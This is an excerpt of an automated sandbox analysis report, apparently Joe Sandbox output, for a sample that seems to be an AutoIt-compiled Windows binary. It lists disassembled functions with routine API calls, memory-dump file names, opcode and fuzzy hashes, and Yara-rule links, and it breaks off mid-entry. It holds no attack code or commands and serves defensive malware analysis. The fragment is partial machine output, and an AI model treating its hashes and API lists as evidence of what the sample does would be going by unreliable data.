                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 2f946b201ec5f5a8a7c8478a4c9d338836236deb88371187c8617ca7e9b66553
                                              • Instruction ID: cc5451e5cbf133f381216d22c07726b55f55e3630081b78f9d6bbbaadb7e7bc1
                                              • Opcode Fuzzy Hash: 2f946b201ec5f5a8a7c8478a4c9d338836236deb88371187c8617ca7e9b66553
                                              • Instruction Fuzzy Hash: EF313B31A00A05ABCB28DF6CC494AADB7F5FF48322F1486A9DC1993750D770B994CB90
                                              Function 00B70C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: 3d547ab254de8bef72e4f021a845cddc3bf60f57939ad4ce22e3e86d10b56eff
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: E731A170A10105DBC71AEF68C4C4A69FBE6FB59300B64C6E6E81ACB355D631EDD1DB80
                                              Function 00B8FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: d80a0cbfe89e4c4274946fd2ab4b854f3780793176342f0fc9523496ad2c5209
                                              • Instruction ID: 4eec1f263c4924e4ac5ac5036ef6462709257bc1df3f0b063da847b61d314a78
                                              • Opcode Fuzzy Hash: d80a0cbfe89e4c4274946fd2ab4b854f3780793176342f0fc9523496ad2c5209
                                              • Instruction Fuzzy Hash: 19410574504341DFDB14DF14C494B1ABBE0BF49315F0989ECE99A9B362D732E849CB52
                                              Function 00B559B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: e75b07057267258661b26c07b81abfdd2a22560227d0709ca859ae3ec03292c2
                                              • Instruction ID: a2e081dc28d433c4b31e5667feff4ae10d0248fefaf719e6223504e8edfb2d4a
                                              • Opcode Fuzzy Hash: e75b07057267258661b26c07b81abfdd2a22560227d0709ca859ae3ec03292c2
                                              • Instruction Fuzzy Hash: B521D871914A08EBDB10AF51E8807AE7BF8FF04311F2184EBE885D5061D77095D0DB45
                                              Function 00B54DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B54BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00B54BEF
                                                • Part of subcall function 00B7525B: __wfsopen.LIBCMT ref: 00B75266
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E0F
                                                • Part of subcall function 00B54B6A: FreeLibrary.KERNEL32(00000000), ref: 00B54BA4
                                                • Part of subcall function 00B54C70: _memmove.LIBCMT ref: 00B54CBA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: a22b6f02fef4ab54fa0ff742f7f499e06b9b8deb63c40c8d2de29a9e035f3c71
                                              • Instruction ID: be2fc6f961dfac910d1e2ab155440e5609404aa3a7643050823dc805b5d3e818
                                              • Opcode Fuzzy Hash: a22b6f02fef4ab54fa0ff742f7f499e06b9b8deb63c40c8d2de29a9e035f3c71
                                              • Instruction Fuzzy Hash: 9E11E731600205ABCF15BF74C817FAD77E4EF44715F1088EEF942A7181EBB19A499B50
                                              Function 00B8FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: b6f003962da78e57425e0186271d25b494337d4a469ea8972517c2cb92e66d48
                                              • Instruction ID: adac41a0122567ade572ba5242b1470e4ca32e52f736700f1d268a54fb8b6e2c
                                              • Opcode Fuzzy Hash: b6f003962da78e57425e0186271d25b494337d4a469ea8972517c2cb92e66d48
                                              • Instruction Fuzzy Hash: 5B211374908301DFCB14EF24C484B2ABBE1BF88315F0589A8F89A57762D731E849CB92
                                              Function 00B55BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00B556A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B55C16
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: c923d3f202ac726c142b7bace49209a2d4b2e9b9a2b77787e022511ce32abb97
                                              • Instruction ID: 3e4e794c90f1e164029d24770a8bba552466dc6695dfdfe3d8097217f8df3ff0
                                              • Opcode Fuzzy Hash: c923d3f202ac726c142b7bace49209a2d4b2e9b9a2b77787e022511ce32abb97
                                              • Instruction Fuzzy Hash: 3F113A71204B059FE3308F19C894B66B7E5EF44762F10C9AEE99A86A51D771F848CB60
                                              Function 00B55A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 68205d27ac4155f798ec0ec681d5576bc6f6357978d24f8a088acc3bb8418320
                                              • Instruction ID: 51d0f4bd627bea8e332200a0e309f033b568e1a82a0898d7c259f083780662a2
                                              • Opcode Fuzzy Hash: 68205d27ac4155f798ec0ec681d5576bc6f6357978d24f8a088acc3bb8418320
                                              • Instruction Fuzzy Hash: 33018FB5600A02AFC315EB68C451D26F7E9FF8A31171485AAF969C7702DB35EC21CBE0
                                              Function 00B74863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                              • __lock_file.LIBCMT ref: 00B748A6
                                                • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2597487223-0
                                              • Opcode ID: 1a2503c4d61c90b35927e20cd04c50c426f99d08ac39f0823fa956d07bb4c282
                                              • Instruction ID: aa9e47a3c10ee9129a97ac8c4e9e3a85df6bf1a19752aac167786ef099165dc7
                                              • Opcode Fuzzy Hash: 1a2503c4d61c90b35927e20cd04c50c426f99d08ac39f0823fa956d07bb4c282
                                              • Instruction Fuzzy Hash: 64F0AF31940609ABDF11AFB48C0A7AE36E0EF00326F15C594F43C9A191CB788A51DB52
                                              Function 00B54E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 571201b6bc3126d3ed77c53b9cf34cdee0ac5d223958c8c58a4bf5dc5a44ce3a
                                              • Instruction ID: 3fbf90e2b877e2e508be1796540aabefa7d4b1a77836fc574fd3bb64e55a4e85
                                              • Opcode Fuzzy Hash: 571201b6bc3126d3ed77c53b9cf34cdee0ac5d223958c8c58a4bf5dc5a44ce3a
                                              • Instruction Fuzzy Hash: E5F03071505751CFCB389F64E495916B7E1FF1432A32089FEE5D782620C7719888DF40
                                              Function 00B70791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B707B0
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: f1bb39f329779d57038be80c9ccfa679a1169a5be699662cca4fb43d02c7ef41
                                              • Instruction ID: e27c6dcc4b0fdd45ecdbe31fd6af82f3ead79c63c9f8adbb313681cdf61c5d2d
                                              • Opcode Fuzzy Hash: f1bb39f329779d57038be80c9ccfa679a1169a5be699662cca4fb43d02c7ef41
                                              • Instruction Fuzzy Hash: 74E08636A4512957C720A6589C05FEAB7DDDB887A1F0441F6FC08D7254DD609C818690
                                              Function 00BB8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                              • Instruction ID: 3553fd6d6f0368e9f1a401640012ef7c2d40a991706f8a2d1f1ce14bd9fdfc5a
                                              • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                              • Instruction Fuzzy Hash: 96E092B0104B045FD7388A24D840BE373E5EB05304F00085DF2AA83241EBA3B841C759
                                              Function 01007F60 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?), ref: 01007F6B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                              • Instruction ID: 845cb4beded8a56630cb80c0f484f072a3f900b244b3d4f942e72fb58fef68d3
                                              • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                              • Instruction Fuzzy Hash: B8E08630505208DBE795CBA88C046BD73A4D705310F004699E595C31C0DA34A940D665
                                              Function 00B55C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00B8DD42,?,?,00000000), ref: 00B55C5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: a7ecd69a2f3863eb4eaa2c97d88c3dc5bf55b448b4ed78f7f1d5f24610dbbe37
                                              • Instruction ID: a3cb6935f9d9da303a763681a0e3895988e80823990b7d1cc198030fdeb13c65
                                              • Opcode Fuzzy Hash: a7ecd69a2f3863eb4eaa2c97d88c3dc5bf55b448b4ed78f7f1d5f24610dbbe37
                                              • Instruction Fuzzy Hash: EFD0C77464420CBFE710DB80DC46FA9B77CD705710F100195FD0467290E6B27D508795
                                              Function 01007F30 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?), ref: 01007F3B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                              • Instruction ID: 2253cc8459ca1d491c809f17296f988ba5cca3a2efdf996f0537d2947e220cda
                                              • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                              • Instruction Fuzzy Hash: 1DD0A77090520CEBDB10CFB8DC049EE73A8D705320F004798FD59C32C1D535A9409750
                                              Function 00B7525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: ae5fdbd9bffaeb62f312959acb3d908732e55506f676240291793ee9d057d1f6
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: 4EB0927644020C77CE112A82EC02A493B5D9B41764F408060FB1C18162A6B3A6649A89
                                              Function 00BBD07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00BBD1FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
